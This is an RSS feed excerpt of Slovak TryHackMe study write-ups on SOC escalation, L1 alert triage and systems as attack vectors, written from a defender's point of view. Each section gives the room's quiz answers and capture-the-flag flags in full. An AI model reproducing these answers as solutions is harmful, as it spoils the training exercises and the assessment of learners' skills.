&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Kritický alert a nedostupné L2&lt;br&gt;
Ak potrebujete eskalovať urgentný alert a L2 nereaguje viac ako 30 minút:&lt;br&gt;
skontrolujte núdzové kontakty&lt;br&gt;
skúste zavolať L2, potom L3&lt;br&gt;
ak stále nikto nereaguje, kontaktujte manažéra&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Kompromitovaný Slack / Teams účet&lt;br&gt;
Ak potrebujete overiť login používateľa:&lt;br&gt;
nekontaktujte ho cez kompromitovaný chat&lt;br&gt;
použite alternatívny spôsob komunikácie (napr. telefón)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Veľké množstvo alertov naraz&lt;br&gt;
Pri náhlej vlne alertov:&lt;br&gt;
prioritizujte podľa závažnosti&lt;br&gt;
informujte L2 na smene, že dochádza k preťaženiu&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Neskoré zistenie chyby v klasifikácii&lt;br&gt;
Ak zistíte, že alert bol pravdepodobne zle vyhodnotený:&lt;br&gt;
okamžite kontaktujte L2&lt;br&gt;
vysvetlite situáciu a obavy&lt;br&gt;
útočníci môžu byť dlho neaktívni pred reálnym dopadom&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Problém so SIEM logmi&lt;br&gt;
Ak nie je možné dokončiť triage kvôli chýbajúcim alebo zle parsovaným logom:&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;

&lt;ul&gt;
&lt;li&gt;alert neignorujte&lt;/li&gt;
&lt;li&gt;analyzujte dostupné dáta&lt;/li&gt;
&lt;li&gt;problém nahláste L2 alebo SOC inžinierovi&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;👉 Základné pravidlo: pri nejasnostiach alebo kritických situáciách vždy komunikovať a eskalovať skôr než neskôr.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Should you first try to contact your manager in case of a critical threat (Yea/Nay)?&lt;br&gt;
&lt;code&gt;nay&lt;/code&gt;&lt;br&gt;
Should you immediately contact your L2 if you think you missed the attack (Yea/Nay)?&lt;br&gt;
&lt;code&gt;yea&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>soc</category>
      <category>tryhackme</category>
      <category>slovak</category>
      <category>hacking</category>
    </item>
    <item>
      <title>THM - SOC L1 Alert Triage</title>
      <dc:creator>mikensen</dc:creator>
      <pubDate>Sat, 07 Mar 2026 06:56:23 +0000</pubDate>
      <link>https://dev.to/mikensen/thm-soc-l1-alert-triage-1o73</link>
      <guid>https://dev.to/mikensen/thm-soc-l1-alert-triage-1o73</guid>
      <description>&lt;h3&gt;
  
  
  O čo ide?
&lt;/h3&gt;

&lt;p&gt;Alert je základný koncept každého SOC tímu — správne zvládnutie alertov rozhoduje medzi odhaleným a zmeškaným útokom.&lt;/p&gt;

&lt;h3&gt;
  
  
  Od Eventov k Alertom
&lt;/h3&gt;

&lt;p&gt;Predstav si situáciu:&lt;br&gt;
Si SOC intern, pozeráš sa na monitor mentora a vidíš stovky alertov — "Email Marked as Phishing", "Unusual Gmail Login Location" a hrozivý "Unapproved Mimikatz Usage" v červenom stĺpci.&lt;/p&gt;

&lt;h3&gt;
  
  
  Ako vznikne alert:
&lt;/h3&gt;

&lt;p&gt;Nastane event (login, spustenie procesu, stiahnutie súboru)&lt;br&gt;
Systém to zaloguje (OS, firewall, cloud)&lt;br&gt;
Logy sa posielajú do SIEM / EDR&lt;br&gt;
Bezpečnostné riešenie vygeneruje alert — upozornenie na podozrivú aktivitu&lt;/p&gt;

&lt;p&gt;💡 Bez alertov by analytici museli ručne prechádzať milióny logov denne. Vďaka alertom riešia len desiatky upozornení.&lt;/p&gt;

&lt;p&gt;Platformy na správu alertov:&lt;br&gt;
TypPríkladySIEMSplunk ES, ElasticEDR/NDRMS Defender, CrowdStrikeSOARSplunk SOAR, CortexITSMJira, TheHive&lt;/p&gt;

&lt;h3&gt;
  
  
  Roly v SOC tíme:
&lt;/h3&gt;

&lt;p&gt;L1 analytik — triaguje alerty, oddeľuje hrozby od falošných poplachov&lt;br&gt;
L2 analytik — hlbšia analýza eskalovaných alertov&lt;br&gt;
SOC engineer — zabezpečuje kvalitu alertov&lt;br&gt;
SOC manager — sleduje rýchlosť a kvalitu triáže&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;What is the number of alerts you see in the SOC dashboard?&lt;br&gt;
&lt;code&gt;5&lt;/code&gt;&lt;br&gt;
What is the name of the most recent alert you see?&lt;br&gt;
&lt;code&gt;Double-Extension File Creation&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Vlastnosti alertov (Alert Properties)
&lt;/h3&gt;

&lt;p&gt;Alert obsahuje niekoľko kľúčových vlastností:&lt;/p&gt;

&lt;p&gt;Čas alertu – kedy bol alert vytvorený (zvyčajne pár minút po skutočnej udalosti)&lt;br&gt;
Názov alertu – stručný popis toho, čo sa stalo (napr. Unusual Login Location, RDP Bruteforce)&lt;br&gt;
Závažnosť – urgentnosť alertu: Nízka / Stredná / Vysoká / Kritická&lt;br&gt;
Stav – či niekto na alerte pracuje: Nový / V riešení / Uzavretý&lt;br&gt;
Verdikt – či ide o skutočnú hrozbu (True Positive) alebo planý poplach (False Positive)&lt;br&gt;
Pridelený analytik – kto je zodpovedný za preskúmanie alertu&lt;br&gt;
Popis – vysvetľuje logiku pravidla, prečo aktivita môže naznačovať útok a ako triážovať&lt;br&gt;
Polia alertu – konkrétne hodnoty, na ktorých alert vypol (napr. názov počítača, zadaný príkaz)&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;What was the verdict for the "Unusual VPN Login Location" alert?&lt;br&gt;
&lt;code&gt;False Positive&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;What user was mentioned in the "Unusual VPN Login Location" alert?&lt;br&gt;
&lt;code&gt;M.Clark&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Prioritizácia alertov v SOC
&lt;/h3&gt;

&lt;p&gt;Keď analytik čelí stovkám alertov, musí rýchlo rozhodnúť, ktorý riešiť ako prvý. Postup je jednoduchý:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Filtrovanie – Vylúč alerty, ktoré už niekto rieši alebo boli preskúmané. Pracuj len s novými, nevyriešenými alertmi.&lt;/li&gt;
&lt;li&gt;Triedenie podľa závažnosti – Najprv critical, potom high, medium a nakoniec low. Platí, že čím vyššia závažnosť, tým väčšia pravdepodobnosť reálnej hrozby s vážnym dopadom.&lt;/li&gt;
&lt;li&gt;Triedenie podľa času – Pri alertoch rovnakej závažnosti začni od najstarších. Útočník zo staršieho incidentu je pravdepodobne ďalej v útoku a spôsobuje väčšie škody ako ten, kto práve začal.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;Should you first prioritise medium over low severity alerts? (Yea/Nay)&lt;br&gt;
&lt;code&gt;Yea&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Should you first take the newest alerts and then the older ones? (Yea/Nay)&lt;br&gt;
&lt;code&gt;Nay&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Assign yourself to the first-priority alert and change its status to In Progress.&lt;br&gt;
The name of your selected alert will be the answer to the question.&lt;br&gt;
&lt;code&gt;Potential Data Exfiltration&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Alert Triage – postup
&lt;/h3&gt;

&lt;p&gt;Úvodné kroky – Priraď si alert na seba a zmeň jeho stav na In Progress. Oboznám sa s názvom, popisom a kľúčovými indikátormi alertu.&lt;br&gt;
Investigácia – Najnáročnejšia časť. Niektoré tímy majú pripravené workbooky (playbooks/runbooks) s návodom pre konkrétne typy alertov. Bez nich platia tieto odporúčania:&lt;/p&gt;

&lt;p&gt;Zisti, kto je ohrozený – používateľ, hostname, sieť, cloud alebo webstránka&lt;br&gt;
Identifikuj podozrivú akciu – prihlásenie, malvér, phishing a pod.&lt;br&gt;
Preskúmaj okolité udalosti – čo sa dialo tesne pred a po alerte&lt;br&gt;
Over závery pomocou threat intelligence platforiem&lt;/p&gt;

&lt;p&gt;Záverečné kroky – Rozhodni, či je alert skutočná hrozba (True Positive) alebo planý poplach (False Positive). Napíš podrobný komentár s postupom a zdôvodnením verdiktu, a alert presuň do stavu Closed.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Which flag did you receive after you correctly triaged the first-priority alert?&lt;br&gt;
&lt;code&gt;THM{looks_like_lots_of_zoom_meetings}&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Which flag did you receive after you correctly triaged the second-priority alert?&lt;br&gt;
&lt;code&gt;THM{how_could_this_user_fall_for_it?}&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Which flag did you receive after you correctly triaged the third-priority alert?&lt;br&gt;
&lt;code&gt;THM{should_we_allow_github_for_devs?}&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>slovak</category>
      <category>tryhackme</category>
      <category>soc</category>
      <category>triage</category>
    </item>
    <item>
      <title>THM - Systems as Attack Vectors</title>
      <dc:creator>mikensen</dc:creator>
      <pubDate>Wed, 04 Mar 2026 12:46:47 +0000</pubDate>
      <link>https://dev.to/mikensen/thm-systems-as-attack-vectors-3k4m</link>
      <guid>https://dev.to/mikensen/thm-systems-as-attack-vectors-3k4m</guid>
      <description>&lt;h2&gt;
  
  
  „Systémy ako vektory útoku“
&lt;/h2&gt;

&lt;blockquote&gt;
&lt;p&gt;Naučte sa, ako útočníci zneužívajú zraniteľné a nesprávne nakonfigurované systémy a ako ich môžete chrániť.&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Pokračujeme v téme SOC a ochrany digitálneho sveta, tentoraz sa zameriame na systémy ako cieľ útokov. Tu sa dozvieš, čo systémy sú, prečo a ako ich útočníci cielia, a čo môžeš ako SOC analytik spraviť, aby bola firma v bezpečí.&lt;/p&gt;

&lt;p&gt;Ciele lekcie:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Pochopiť úlohu systémov v digitálnom svete&lt;/li&gt;
&lt;li&gt;Pozrieť si reálne útoky na systémy&lt;/li&gt;
&lt;li&gt;Vyskúšať si získané vedomosti v dvoch praktických scenároch&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Útočníci môžu napadnúť slabé systémy priamo, bez toho, aby si používatelia všimli. Čím cennejší systém (server, cloud, PC), tým väčšia škoda – napr. mail server môže ohroziť tisícky účtov, študentský laptop len jeden účet.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;Môžu sa kybernetické útoky stať bez akéhokoľvek zásahu obete? (Áno / Nie)&lt;br&gt;
&lt;code&gt;Yea&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Môže porušenie (breach) len jediného systému viesť ku katastrofálnym následkom? (Áno / Nie)&lt;br&gt;
&lt;code&gt;Yea&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Väčšina útokov začína získaním prístupu do cieľového systému, potom útočník kradne dáta, nasadí ransomware alebo ničí informácie.&lt;/p&gt;

&lt;p&gt;Ako systémy napádajú ľudia a softvér:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Ľudia: USB z ulice, stiahnutý malware, opakované slabé heslá (81 % únikov zahŕňa ukradnuté heslá).&lt;/li&gt;
&lt;li&gt;Zraniteľnosti: Každý softvér môže mať chyby; tisíce nových zraniteľností sú každý rok aktívne zneužívané.&lt;/li&gt;
&lt;li&gt;Dodávateľský reťazec: Napadnutie knižnice alebo aplikácie môže ohroziť všetkých používateľov – známe prípady SolarWinds či 3CX.&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;Ako sa volá bezpečnostná chyba, ktorú je možné zneužiť na prelomenie systému?&lt;br&gt;
&lt;code&gt;Vulnerability&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Ako sa volá útok, keď malware pochádza z dôveryhodnej aplikácie alebo knižnice?&lt;br&gt;
&lt;code&gt;Supply Chain&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Každý softvér má chyby, niektoré sa odhalia až po rokoch. Ak útočník nájde chybu skôr než ostatní, ide o zero-day.&lt;br&gt;
Keď sa zraniteľnosť sprístupní, dostane CVE číslo a začína závod: útočníci vyvíjajú exploity, obrancovia aktualizujú systémy.&lt;/p&gt;

&lt;p&gt;Ako reagovať:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Použiť záplatu od dodávateľa&lt;/li&gt;
&lt;li&gt;Obmedziť prístup len na dôveryhodné IP&lt;/li&gt;
&lt;li&gt;Použiť dočasné opatrenia od výrobcu&lt;/li&gt;
&lt;li&gt;Blokovať známe útoky cez IPS/WAF&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;Aké je CVE pre kritickú zraniteľnosť SharePointu nazývanú 'ToolShell'?&lt;br&gt;
&lt;code&gt;CVE-2025-53770&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Ako by si reagoval na zistenú zraniteľnosť vo svojom systéme?&lt;br&gt;
&lt;code&gt;Patch&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Misconfigurations sú chyby v nastavení systému, nie v softvéri – často kvôli jednoduchosti alebo pohodliu (napr. heslo “1111”).&lt;/p&gt;

&lt;p&gt;Príklady:&lt;br&gt;
Heslo “123456” odhalilo 64 miliónov žiadostí o prácu McDonald’s&lt;br&gt;
Zle nastavený AWS cloud ohrozil 106 miliónov bankových účtov&lt;br&gt;
Nesprávne nakonfigurované smart chladničky použité v botnetoch&lt;/p&gt;

&lt;p&gt;Ako reagovať:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Oprav nastavenia, žiadny patch nie je potrebný&lt;/li&gt;
&lt;li&gt;Penetračné testy a etickí hackeri&lt;/li&gt;
&lt;li&gt;Pravidelné skeny zraniteľností&lt;/li&gt;
&lt;li&gt;Ručné audity konfigurácie podľa bezpečnostných štandardov&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;Môže patch systému alebo aktualizácia softvéru opraviť nesprávne nastavenia (misconfigurations)?&lt;br&gt;
&lt;code&gt;Nay&lt;/code&gt;&lt;/p&gt;

&lt;p&gt;Ktorá aktivita zahŕňa autorizovaný kybernetický útok na odhalenie nesprávnych nastavení (misconfigurations)&lt;br&gt;
&lt;code&gt;Penetration testing&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;Útočníci hľadajú vždy najľahšiu cestu – cez chybu systému alebo človeka. Preto treba chrániť ľudí aj systémy kombináciou mitigácie a detekcie.&lt;/p&gt;

&lt;p&gt;Najbežnejšie opatrenia na ochranu systémov:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Patch management: pravidelne záplatuj zraniteľné systémy&lt;/li&gt;
&lt;li&gt;Školenie IT: menej chýb pri nastavovaní systémov&lt;/li&gt;
&lt;li&gt;Ochrana siete: prístup len pre dôveryhodné IP/ľudí&lt;/li&gt;
&lt;li&gt;Antivírus: detekuje alebo zastaví útoky&lt;/li&gt;
&lt;/ul&gt;

&lt;blockquote&gt;
&lt;p&gt;What flag did you receive after completing the "Systems at Risk" challenge?&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;code&gt;THM{patch_or_reconfigure?}&lt;/code&gt;&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;What flag did you receive after completing the "Remediation Plan" challenge?&lt;/p&gt;
&lt;/blockquote&gt;

&lt;p&gt;&lt;code&gt;THM{best_systems_defender!}&lt;/code&gt;&lt;/p&gt;

</description>
      <category>tryhackme</category>
      <category>slovensko</category>
      <category>hacking</category>
      <category>testing</category>
    </item>
  </channel>
</rss>
